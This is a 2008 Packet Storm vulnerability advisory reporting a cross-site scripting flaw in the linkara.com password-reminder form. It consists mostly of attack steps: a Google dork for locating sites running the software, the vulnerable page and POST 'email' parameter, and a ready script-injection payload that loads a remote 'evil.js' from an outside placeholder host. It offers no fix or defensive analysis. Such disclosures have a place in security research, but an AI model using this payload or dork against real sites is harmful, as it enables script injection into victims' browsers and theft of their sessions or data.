linkara-xss.txt

2008-06-26T00:00:00
ID PACKETSTORM:67691
Type packetstorm
Reporter Ivan Sanchez
Modified 2008-06-26T00:00:00

Description

                                        
                                            `+==========================================================================+  
+ Copyright 2004/2008 - Linkara & XSS Remote evil cOD3 +  
+==========================================================================+  
  
  
Author(s): Ivan Sanchez   
  
Product: © Copyright 2004/2008 - Linkara, S.L.   
  
Web:http://www.linkara.com/  
  
Versions: 2004/2008 - Linkara  
  
Date: 25/06/2008  
  
  
"Linkara.com is a free comunity in Internet.... "  
  
  
  
  
GOOGLE DORKS:  
------------  
  
"Copyright 2004/2008 - Linkara"  
  
  
  
  
  
Exploit:  
-------  
  
¿Has olvidado tu contraseña?  
  
  
http://www.linkara.com/recordar.html  
  
  
In the Texbox insert evil remote code.  
  
tHEN (wait seconds...)  
  
  
Parameter POST=email (insert there evil , remote XSS)  
  
  
Example: "><script src=http://site/scripts/evil.js></script>   
  
  
  
  
NULL CODE SERVICES [ www.nullcode.com.ar ] Hunting Security Bugs!  
+==========================================================================+  
+ Copyright 2004/2008 - Linkara & XSS Remote evil cOD3 +  
+==========================================================================+`